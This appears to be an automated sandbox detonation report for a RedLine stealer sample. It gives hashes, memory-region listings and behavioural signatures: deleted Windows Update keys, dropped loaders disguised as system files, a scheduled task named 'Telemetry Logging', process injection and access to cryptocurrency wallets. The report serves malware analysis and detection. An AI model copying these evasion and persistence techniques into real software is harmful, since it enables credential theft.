| MD5 | f5c51e7760315ad0f0238d268c03c60e |
| SHA1 | 85ebaaa9685634143a72bc82c6e7df87a78eed4c |
| SHA256 | ea42fcee681ec3b06dac54d3da4b866143d68cbaa0dd0e00e7c10ae2a7c9d2aa |
| SHA512 | d3b9ac3bf5467bd25439f2d29457361ac14d1be5b060078a7ef4f78540994679f9fed245d70a4e2a6edbc37b94a042be407ad7fbbd5a95600312946ffb558f35 |
memory/1444-85-0x0000000073170000-0x000000007371B000-memory.dmp
memory/888-86-0x0000000004DA0000-0x0000000004F06000-memory.dmp
memory/888-88-0x0000000005050000-0x000000000519E000-memory.dmp
memory/888-89-0x00000000004F0000-0x0000000000504000-memory.dmp
memory/1824-90-0x0000000001F10000-0x0000000002414000-memory.dmp
memory/1824-91-0x0000000001F10000-0x0000000002414000-memory.dmp
memory/1824-92-0x0000000001D20000-0x0000000001E5D000-memory.dmp
memory/888-94-0x00000000011D6000-0x00000000011E7000-memory.dmp
memory/1824-95-0x0000000001D20000-0x0000000001E5D000-memory.dmp
memory/836-96-0x000007FEFB9B1000-0x000007FEFB9B3000-memory.dmp
memory/836-97-0x000007FEF4010000-0x000007FEF4A33000-memory.dmp
memory/836-99-0x0000000002004000-0x0000000002007000-memory.dmp
memory/836-98-0x000007FEF34B0000-0x000007FEF400D000-memory.dmp
memory/836-101-0x000000000200B000-0x000000000202A000-memory.dmp
memory/836-100-0x0000000002004000-0x0000000002007000-memory.dmp
memory/1476-102-0x0000000000000000-mapping.dmp
memory/2036-104-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | f6ac30a716fb38a199acd68465d503fd |
| SHA1 | f00a7d0220f702a1a15dab76c1fee17caefd1c09 |
| SHA256 | a2a5189f4d8cf19f66bbbb5c3c6958bd18d47d1685fdddebc6cc9064639202ca |
| SHA512 | 20dbe4dd2e1a830ba822b19589d3b42cd43382837d46b7ba58e3f36e6cd6bf39a489b705d28b7a1ddfb02039e91b9e1220f03e2fe46b71ce92101bcdb30887f1 |
\??\PIPE\srvsvc
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
memory/1120-107-0x0000000000000000-mapping.dmp
memory/936-108-0x0000000000000000-mapping.dmp
memory/1628-109-0x000007FEF3670000-0x000007FEF4093000-memory.dmp
memory/1628-110-0x000007FEF2B10000-0x000007FEF366D000-memory.dmp
memory/1588-111-0x0000000000000000-mapping.dmp
memory/1628-112-0x0000000002344000-0x0000000002347000-memory.dmp
memory/1628-113-0x000000000234B000-0x000000000236A000-memory.dmp
memory/1716-114-0x0000000000000000-mapping.dmp
memory/1712-115-0x0000000000000000-mapping.dmp
memory/1068-116-0x0000000000000000-mapping.dmp
memory/1872-117-0x0000000000000000-mapping.dmp
memory/1596-118-0x0000000000000000-mapping.dmp
memory/1372-119-0x0000000000000000-mapping.dmp
memory/1628-120-0x0000000002344000-0x0000000002347000-memory.dmp
memory/1628-121-0x000000000234B000-0x000000000236A000-memory.dmp
memory/1428-123-0x0000000140001938-mapping.dmp
memory/1824-124-0x0000000001F10000-0x0000000002414000-memory.dmp
memory/1264-125-0x0000000000000000-mapping.dmp
memory/656-126-0x0000000000000000-mapping.dmp
memory/1824-129-0x0000000001D20000-0x0000000001E5D000-memory.dmp
memory/1264-131-0x000007FEF4010000-0x000007FEF4A33000-memory.dmp
memory/1264-132-0x000007FEF34B0000-0x000007FEF400D000-memory.dmp
memory/1264-133-0x00000000011C4000-0x00000000011C7000-memory.dmp
memory/656-134-0x0000000071330000-0x00000000718DB000-memory.dmp
memory/1264-135-0x00000000011CB000-0x00000000011EA000-memory.dmp
memory/1264-136-0x0000000077130000-0x00000000772D9000-memory.dmp
memory/1264-137-0x0000000076F10000-0x000000007702F000-memory.dmp
memory/1264-138-0x0000000077130000-0x00000000772D9000-memory.dmp
memory/864-139-0x0000000140000000-0x0000000140029000-memory.dmp
memory/864-140-0x0000000140002314-mapping.dmp
memory/864-144-0x0000000077130000-0x00000000772D9000-memory.dmp
memory/1264-143-0x00000000011C4000-0x00000000011C7000-memory.dmp
memory/864-145-0x0000000076F10000-0x000000007702F000-memory.dmp
memory/864-142-0x0000000140000000-0x0000000140029000-memory.dmp
memory/420-146-0x0000000000820000-0x0000000000841000-memory.dmp
memory/420-150-0x0000000037170000-0x0000000037180000-memory.dmp
memory/420-149-0x000007FEBEE00000-0x000007FEBEE10000-memory.dmp
memory/864-154-0x0000000140000000-0x0000000140029000-memory.dmp
memory/464-153-0x000007FEBEE00000-0x000007FEBEE10000-memory.dmp
memory/864-155-0x0000000077130000-0x00000000772D9000-memory.dmp
memory/464-156-0x0000000037170000-0x0000000037180000-memory.dmp
memory/480-161-0x0000000037170000-0x0000000037180000-memory.dmp
memory/420-165-0x0000000000850000-0x0000000000877000-memory.dmp
memory/488-170-0x00000000001F0000-0x0000000000217000-memory.dmp
memory/716-182-0x0000000037170000-0x0000000037180000-memory.dmp
memory/792-184-0x000007FEBEE00000-0x000007FEBEE10000-memory.dmp
memory/716-181-0x000007FEBEE00000-0x000007FEBEE10000-memory.dmp
memory/660-180-0x0000000037170000-0x0000000037180000-memory.dmp
memory/660-179-0x000007FEBEE00000-0x000007FEBEE10000-memory.dmp
memory/584-177-0x0000000037170000-0x0000000037180000-memory.dmp
memory/584-176-0x000007FEBEE00000-0x000007FEBEE10000-memory.dmp
memory/480-169-0x0000000000070000-0x0000000000097000-memory.dmp
memory/488-167-0x0000000037170000-0x0000000037180000-memory.dmp
memory/464-166-0x00000000000F0000-0x0000000000117000-memory.dmp
memory/488-164-0x000007FEBEE00000-0x000007FEBEE10000-memory.dmp
memory/480-160-0x000007FEBEE00000-0x000007FEBEE10000-memory.dmp
memory/420-158-0x0000000000820000-0x0000000000841000-memory.dmp
memory/792-248-0x0000000037170000-0x0000000037180000-memory.dmp
memory/828-251-0x0000000037170000-0x0000000037180000-memory.dmp
memory/1028-255-0x00000000001B0000-0x00000000001D7000-memory.dmp
memory/1392-259-0x0000000002A20000-0x0000000002A47000-memory.dmp
memory/2004-263-0x0000000037170000-0x0000000037180000-memory.dmp
memory/1700-266-0x0000000000330000-0x0000000000357000-memory.dmp
memory/864-265-0x0000000000DC0000-0x0000000000DE7000-memory.dmp
memory/1320-264-0x0000000000AA0000-0x0000000000AC7000-memory.dmp
memory/2004-262-0x0000000000490000-0x00000000004B7000-memory.dmp
memory/1612-261-0x0000000000780000-0x00000000007A7000-memory.dmp
memory/1128-260-0x00000000001E0000-0x0000000000207000-memory.dmp
memory/1780-258-0x0000000000470000-0x0000000000497000-memory.dmp
memory/1240-257-0x0000000001C80000-0x0000000001CA7000-memory.dmp
memory/1336-256-0x0000000000170000-0x0000000000197000-memory.dmp
memory/276-254-0x0000000001C00000-0x0000000001C27000-memory.dmp
memory/868-253-0x0000000037170000-0x0000000037180000-memory.dmp
memory/868-252-0x00000000004B0000-0x00000000004D7000-memory.dmp
memory/828-250-0x00000000008F0000-0x0000000000917000-memory.dmp
memory/296-249-0x0000000000BE0000-0x0000000000C07000-memory.dmp
memory/792-247-0x00000000007E0000-0x0000000000807000-memory.dmp
memory/716-246-0x0000000000910000-0x0000000000937000-memory.dmp
memory/660-245-0x0000000000310000-0x0000000000337000-memory.dmp
memory/584-244-0x0000000000400000-0x0000000000427000-memory.dmp
memory/656-243-0x0000000071330000-0x00000000718DB000-memory.dmp
memory/1264-267-0x00000000011CB000-0x00000000011EA000-memory.dmp
memory/1264-269-0x0000000077130000-0x00000000772D9000-memory.dmp
memory/1264-270-0x0000000076F10000-0x000000007702F000-memory.dmp
memory/1824-271-0x000000000EA00000-0x000000000EA57000-memory.dmp
memory/864-272-0x0000000077130000-0x00000000772D9000-memory.dmp
memory/1700-273-0x0000000000330000-0x0000000000357000-memory.dmp
memory/1596-277-0x0000000000000000-mapping.dmp
memory/1524-283-0x0000000037170000-0x0000000037180000-memory.dmp
memory/1824-284-0x0000000001D20000-0x0000000001E5D000-memory.dmp
memory/1524-282-0x0000000001A30000-0x0000000001A57000-memory.dmp
memory/1660-290-0x00000000001A0000-0x00000000001C7000-memory.dmp
memory/1660-289-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe
| MD5 | b6bbab9f72c88d07b484cc339c475e75 |
| SHA1 | f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1 |
| SHA256 | dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f |
| SHA512 | 1ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5 |
C:\Windows\System32\Tasks\Telemetry Logging
| MD5 | c06f2d1947ad604f393a07dc6f001b3d |
| SHA1 | fb4063ffe535716bc7ef8e2ae1556678a83b6729 |
| SHA256 | e31537d7c912142191d592ec7284e0ab2281dc865ef69a8036997dea93bd94f5 |
| SHA512 | 15f3dfff619b303be430f3e93a5755b7d71d4da0739672543af7d9624d247b8ca92c354fe7a25f3417dfa99b99d52630d0f39608189f5706b3c133625fddb871 |
memory/1100-296-0x0000000000000000-mapping.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2023-01-28 19:33
Reported
2023-01-28 19:36
Platform
win10v2004-20220812-en
Max time kernel
150s
Max time network
105s
Command Line
Signatures
Modifies security service
| Description | Indicator | Process | Target |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 | C:\Windows\System32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 | C:\Windows\System32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo | C:\Windows\System32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters | C:\Windows\System32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security | C:\Windows\System32\reg.exe | N/A |
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of NtCreateProcessExOtherParentProcess
| Description | Indicator | Process | Target |
| PID 2944 created 3216 | N/A | C:\Windows\system32\WerFault.exe | C:\Windows\system32\DllHost.exe |
| PID 4392 created 2908 | N/A | C:\Windows\system32\WerFault.exe | C:\Windows\system32\DllHost.exe |
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 3316 created 3032 | N/A | C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe | C:\Windows\Explorer.EXE |
| PID 3316 created 3032 | N/A | C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe | C:\Windows\Explorer.EXE |
| PID 3316 created 3032 | N/A | C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe | C:\Windows\Explorer.EXE |
| PID 3316 created 3032 | N/A | C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe | C:\Windows\Explorer.EXE |
| PID 4536 created 588 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\system32\winlogon.exe |
| PID 3768 created 3216 | N/A | C:\Windows\System32\svchost.exe | C:\Windows\system32\DllHost.exe |
| PID 3768 created 2908 | N/A | C:\Windows\System32\svchost.exe | C:\Windows\system32\DllHost.exe |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\C4Loader.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\new2.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\SysApp.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe | N/A |
Stops running service(s)
Uses the VBS compiler for execution
Accesses cryptocurrency files/wallets, possible credential harvesting
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\80237EE4964FC9C409AAF55BF996A292_C0427F5F77D9B3A439FC620EDAAB6177 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 | C:\Windows\system32\svchost.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\80237EE4964FC9C409AAF55BF996A292_C5130A0BDC8C859A2757D77746C10868 | C:\Windows\system32\svchost.exe | N/A |
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\80237EE4964FC9C409AAF55BF996A292_E503B048B745DFA14B81FCFC68D6DECE | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Tasks\Telemetry Logging | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx | C:\Windows\System32\svchost.exe | N/A |
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.EXE.log | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1180 set thread context of 1604 | N/A | C:\Users\Admin\AppData\Local\Temp\1d678410484e34165adb652f7e86a2b5cae5f58d.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe |
| PID 4800 set thread context of 4568 | N/A | C:\Users\Admin\AppData\Local\Temp\new2.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe |
| PID 3316 set thread context of 1940 | N/A | C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe | C:\Windows\System32\dialer.exe |
| PID 4536 set thread context of 4920 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\System32\dllhost.exe |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe | C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
Program crash
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\system32\WerFault.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\WerFault.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
